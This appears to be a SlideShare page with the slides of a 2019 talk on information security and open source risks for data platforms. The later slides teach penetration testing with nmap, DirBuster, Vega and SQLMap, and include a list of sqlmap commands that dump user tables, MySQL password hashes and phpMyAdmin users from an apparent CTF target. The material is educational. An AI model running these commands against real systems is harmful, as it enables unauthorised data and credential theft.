OSINT Basics for Threat Hunters and Practitioners
 
Dev{sec}ops
Dev{sec}opsDev{sec}ops
Dev{sec}ops
 
Web Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging ThreatsWeb Application Testing for Today’s Biggest and Emerging Threats
Web Application Testing for Today’s Biggest and Emerging Threats
 
Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0Security Testing ModernApps_v1.0
Security Testing ModernApps_v1.0
 
Software Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and SecuritySoftware Analytics: Data Analytics for Software Engineering and Security
Software Analytics: Data Analytics for Software Engineering and Security
 
Ceh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networksCeh v8 labs module 03 scanning networks
Ceh v8 labs module 03 scanning networks
 
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wnedLayer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
Layer one 2011-joe-mccray-you-spent-all-that-money-and-still-got-0wned
 
PROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITYPROGRAMMING AND CYBER SECURITY
PROGRAMMING AND CYBER SECURITY
 
Security guidelines
Security guidelinesSecurity guidelines
Security guidelines
 
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
Streaming Cyber Security into Graph: Accelerating Data into DataStax Graph an...
 

More from Chetan Khatri

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
Chetan Khatri
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
Chetan Khatri
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
Chetan Khatri
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
Chetan Khatri
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Chetan Khatri
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
Chetan Khatri
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
Chetan Khatri
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
Chetan Khatri
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
Chetan Khatri
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
Chetan Khatri
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
Chetan Khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
Chetan Khatri
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
Chetan Khatri
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
Chetan Khatri
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
Chetan Khatri
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
Chetan Khatri
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
Chetan Khatri
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
Chetan Khatri
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
Chetan Khatri
 

More from Chetan Khatri (20)

PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-AirflowPyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
PyconZA19-Distributed-workloads-challenges-with-PySpark-and-Airflow
 
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in productionScalaTo July 2019 - No more struggles with Apache Spark workloads in production
ScalaTo July 2019 - No more struggles with Apache Spark workloads in production
 
No more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in productionNo more struggles with Apache Spark workloads in production
No more struggles with Apache Spark workloads in production
 
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_productionPyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
PyConLT19-No_more_struggles_with_Apache_Spark_(PySpark)_workloads_in_production
 
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scalaAutomate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
Automate ml workflow_transmogrif_ai-_chetan_khatri_berlin-scala
 
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
HBaseConAsia 2018 - Scaling 30 TB's of Data lake with Apache HBase and Scala ...
 
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
TransmogrifAI - Automate Machine Learning Workflow with the power of Scala an...
 
An Introduction to Spark with Scala
An Introduction to Spark with ScalaAn Introduction to Spark with Scala
An Introduction to Spark with Scala
 
HBase with Apache Spark POC Demo
HBase with Apache Spark POC DemoHBase with Apache Spark POC Demo
HBase with Apache Spark POC Demo
 
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
HKOSCon18 - Chetan Khatri - Open Source AI / ML Technologies and Application ...
 
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
HKOSCon18 - Chetan Khatri - Scaling TB's of Data with Apache Spark and Scala ...
 
Fossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatriFossasia 2018-chetan-khatri
Fossasia 2018-chetan-khatri
 
Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...Fossasia ai-ml technologies and application for product development-chetan kh...
Fossasia ai-ml technologies and application for product development-chetan kh...
 
An Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learningAn Introduction Linear Algebra for Neural Networks and Deep learning
An Introduction Linear Algebra for Neural Networks and Deep learning
 
Introduction to Computer Science
Introduction to Computer ScienceIntroduction to Computer Science
Introduction to Computer Science
 
An introduction to Git with Atlassian Suite
An introduction to Git with Atlassian SuiteAn introduction to Git with Atlassian Suite
An introduction to Git with Atlassian Suite
 
Think machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetanThink machine-learning-with-scikit-learn-chetan
Think machine-learning-with-scikit-learn-chetan
 
A step towards machine learning at accionlabs
A step towards machine learning at accionlabsA step towards machine learning at accionlabs
A step towards machine learning at accionlabs
 
Voltage measurement using arduino
Voltage measurement using arduinoVoltage measurement using arduino
Voltage measurement using arduino
 
Design & Building Smart Energy Meter
Design & Building Smart Energy MeterDesign & Building Smart Energy Meter
Design & Building Smart Energy Meter
 

Recently uploaded

Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
Ana-Maria Mihalceanu
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
Product School
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
James Anderson
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Inflectra
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
Product School
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
UiPathCommunity
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
Product School
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
Alan Dix
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
Jemma Hussein Allen
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
RTTS
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
ThousandEyes
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
Product School
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Product School
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
Guy Korland
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
DianaGray10
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
ControlCase
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Product School
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
Elena Simperl
 

Recently uploaded (20)

Monitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR EventsMonitoring Java Application Security with JDK Tools and JFR Events
Monitoring Java Application Security with JDK Tools and JFR Events
 
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
AI for Every Business: Unlocking Your Product's Universal Potential by VP of ...
 
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
GDG Cloud Southlake #33: Boule & Rebala: Effective AppSec in SDLC using Deplo...
 
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdfFIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
FIDO Alliance Osaka Seminar: Passkeys and the Road Ahead.pdf
 
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdfFIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
FIDO Alliance Osaka Seminar: FIDO Security Aspects.pdf
 
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered QualitySoftware Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
Software Delivery At the Speed of AI: Inflectra Invests In AI-Powered Quality
 
How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...How world-class product teams are winning in the AI era by CEO and Founder, P...
How world-class product teams are winning in the AI era by CEO and Founder, P...
 
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
Dev Dives: Train smarter, not harder – active learning and UiPath LLMs for do...
 
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
De-mystifying Zero to One: Design Informed Techniques for Greenfield Innovati...
 
Epistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI supportEpistemic Interaction - tuning interfaces to provide information for AI support
Epistemic Interaction - tuning interfaces to provide information for AI support
 
The Future of Platform Engineering
The Future of Platform EngineeringThe Future of Platform Engineering
The Future of Platform Engineering
 
JMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and GrafanaJMeter webinar - integration with InfluxDB and Grafana
JMeter webinar - integration with InfluxDB and Grafana
 
Assuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyesAssuring Contact Center Experiences for Your Customers With ThousandEyes
Assuring Contact Center Experiences for Your Customers With ThousandEyes
 
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
From Siloed Products to Connected Ecosystem: Building a Sustainable and Scala...
 
Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...Mission to Decommission: Importance of Decommissioning Products to Increase E...
Mission to Decommission: Importance of Decommissioning Products to Increase E...
 
GraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge GraphGraphRAG is All You need? LLM & Knowledge Graph
GraphRAG is All You need? LLM & Knowledge Graph
 
UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4UiPath Test Automation using UiPath Test Suite series, part 4
UiPath Test Automation using UiPath Test Suite series, part 4
 
PCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase TeamPCI PIN Basics Webinar from the Controlcase Team
PCI PIN Basics Webinar from the Controlcase Team
 
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
Unsubscribed: Combat Subscription Fatigue With a Membership Mentality by Head...
 
Knowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and backKnowledge engineering: from people to machines and back
Knowledge engineering: from people to machines and back
 

Demystify Information Security & Threats for Data-Driven Platforms With Chetan Khatri

  • 1. Demystify Information Security & Threats for Data-Driven Platforms Chetan Khatri Solution Architect - Data & ML. Accionlabs Inc. 18th Oct, 2019
  • 2. Who Am I? Professional Career: ● 2016 - Present. - Technical Lead / Solution Architect - Data & ML. ● 2015 - 2016 - Principal Big Data Engineer, Lead - Data Science Practice. ● 2014 - 2016 - Developer - Data Platforms. ● 2012 - 2014 - Consultant - Product developments. University: Master of Computer Science. Data Warehousing, Data Mining, Information Security / Cryptography, Reverse Engineering, Information Retrieval.
  • 3. Agenda ● Motivation ● Information Security - Ethics. ● Encryption ● Authentication ● Information Security & Potential threats with Open Source World. ● Find vulnerabilities. ● Checklist before using any Open Source library. ● Vulnerabilities report. ● Penetration Testing for Data Driven Developments.
  • 4. Information Security - Motivation Why Information Security is important?
  • 5. Information Security - Motivation Source: https://www.huffingtonpost.in/2018/07/06/hackers-have-ac cessed-email-ids-phone-numbers-of-over-5-million-yatra-u sers_a_23475885/
  • 6. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 7. Information Security - Motivation Source: https://techcrunch.com/2019/01/30/state-b ank-india-data-leak/
  • 8. Information Security - Motivation Source: https://economictimes.indiatimes.com/smal l-biz/security-tech/security/zomato-hacked- security-breach-results-in-17-million-user-d ata-stolen/articleshow/58729251.cms
  • 9. Information Security - Motivation Source: https://www.forbes.com/sites/zakdoffman/2 019/07/09/warning-as-millions-of-zoom-us ers-risk-webcam-hijack-change-your-settin gs-now/#281cb40642d9
  • 14. Information Security - Ethics. ● Information Storage - What, Which form, Access to whom? ● Information Usage - Where, How, Which form? ● Responsibility - Ownership, usage? ● Confidentiality ● Authentication ● Governance - Regulators, Guidelines, Damage? ● Freedom vs Force ● Damage to the Society. ● Impact on humanity. ● Data Breach and Cost.
  • 18. Data Monetization against ethics Source: https://techcrunch.com/2019/03/22/facebook-staff-raised-concerns- about-cambridge-analytica-in-september-2015-per-court-filing/ Source: https://www.theguardian.com/news/2018/mar/17/cambridge-analyti ca-facebook-influence-us-election
  • 19. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Source: https://www.digitaltrends.com/news/equifax-data-breach-class-action-lawsuit-hack -password/
  • 20. Encryption How many people have seen Password in Plain Text at Database? 80%?? 90%?? Yes, Sad but True. Never ever store password of the application in Plain-text. Encrypt it. Use Asymmetric Key Encryption If RSA, use ssh-keygen -t rsa -b 4096
  • 21. Authentication Open IP Open Ports Default Username and Password for Database, Services etc. Chmod 777 for all directories, files ! Lol ;p
  • 22. Information Security & Potential threats with Open Source World.
  • 23. Information Security & Potential threats with Open Source World. How many of you use Open Source ?
  • 24. Security for Open Source world How well do you know what is inside your project?
  • 25. Security for Open Source world Known Good Development practices. Community Supported Open Source Code. v/s Random Code found on the Internet.
  • 26. Vulnerability in Open Source Source: https://synopsys.com/content/dam/synopsys/sig-assets/repo rts/2018-ossra.pdf
  • 27. How Do I Choose GOOD Open Source
  • 28. How do I choose SECURE open source packages?
  • 29. How do I choose SECURE open source packages? Have a look First look
  • 30. Key questions for a first look? ● Read the README.md or any other readily accessible introductory information? ● Does code seem to be held with good software development standards? ● Does this code develop for professional purposes or hobby projects? ● Any signs for known issues in the code? ● Does this code only solve one use case or is it robust enough for other use cases? ● Is this code active or an archive, “abandoned”? Look for warning signs...
  • 32. Even an author says - to use something else! Source: https://code.google.com/archive/p/c rypto-js/
  • 33. Build by an unauthorized person Source: https://metacpan.org/release/Tivoli- AccessManager-Admin
  • 34. I did not write this code, but I like it. Source: https://github.com/kbranigan/cJSON
  • 35. Not maintained anymore … Archived! Source: https://code.google.com/archive/p/crypto-js/
  • 36. Dumbest library - An author! Source: https://github.com/kbranigan/cJSON/commit/730 209a718cc9bada631cea136d13017752720f5
  • 37. It is slower and more subjective to side-channel attacks by nature. Source: http://www.literatecode.com/aes256
  • 38. What to watch before using any package/library?
  • 39. Key Questions for each Open Source Library Do only 1-2 Collaborators exist? Chances are more to have unreviewed, harmful code. Code merged to master branch is been reviewed with PR? How many issues are OPEN? Validate that OPEN issues are being addressed? Is that code maintained or abandon? Are issues getting fixed and released promptly?
  • 40. Key Questions for each Open Source Library Check recently active committers and commit? To understand how old is the project. Check how they handle vulnerabilities and security. How you can report security vulnerabilities? Check open security bugs/issues? Good example: Apache Community. https://www.apache.org/security/
  • 43. No known vulnerabilities doesn’t mean SECURITY! 1101 new vulnerabilities reported only in Oct, 2019. Source: https://nvd.nist.gov/vuln/full-l isting/2019/10
  • 44. Vulnerabilities report we are going far worse! Source: https://www.cvedetails.com/brows e-by-date.php
  • 46. Check number of OPEN services and ports sudo nmap -p- -sS -A IP-Address
  • 47. Server Files / Directories Scan on permission and Access java -jar DirBuster-0.12.jar -H -u http://167.71.224.201:1337 httrack website copier
  • 48. Subgraph Vega ● Vega is a free and open source web security scanner and web security testing platform to test the security of web applications. ● SQL Injection ● XSS ● Inadvertently disclosed sensitive information ● Reflected cross-site scripting ● Stored cross-site scripting ● Blind SQL injection ● Remote file include ● Shell injection ● TLS / SSL security settings
  • 49. Setup Proxy for Vega Tool
  • 50. Setup Proxy for Vega Tool
  • 51. Vega - Start the proxy!
  • 52. Vega - Start scanning Web application
  • 53. Vega - Start scanning Web application
  • 56. Web Application - Tracing web request payload at Proxy
  • 57. Web Application - Tracing web request payload at Proxy
  • 58. Web Application - Intercepting the response callback at Proxy
  • 59. SqlMap - A penetration testing tool for exploiting SQL injection flaws and a lot! ● Database fingerprinting. ● Full Support for SQL Injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band. ● Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack. ● dump database tables entirely. ● Out of Box Search support for Database names, Table names, Column names and values. ● Support to execute arbitrary commands and retrieve their standard output. ● Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server.
  • 60. Demo - Penetration testing a Web Application using SQLMap
  • 61. Demo - Penetration testing a Web Application using SQLMap
  • 62. Demo - Penetration testing a Web Application using SQLMap
  • 63. Demo - Penetration testing a Web Application using SQLMap
  • 64. Demo - Penetration testing a Web Application using SQLMap
  • 65. Demo - Penetration testing a Web Application using SQLMap
  • 66. Demo - Penetration testing a Web Application using SQLMap
  • 67. Demo - Penetration testing a Web Application using SQLMap
  • 68. Demo - Penetration testing a Web Application using SQLMap
  • 69. SQLMap - Commands python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables user_profile python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T user_profile -C Email, Mobile, Name --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T ctf --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D ctf -T flag -C Flag1 --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D mysql -T user -C User, Password --dump python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D test --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin --tables python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns python sqlmap.py -r ctf.log -p"email" --dbms=MYSQL --dbs -D phpmyadmin -T pma__users --columns --dump https://gist.github.com/chetkhatri/45b76d3f2d1da1d798d86a 8709f33ac5
  • 71. Hope you had a fun!
  • 72. Thank you! Chetan Khatri, chetan.khatri@live.com @khatri_chetan - https://twitter.com/khatri_chetan https://github.com/chetkhatri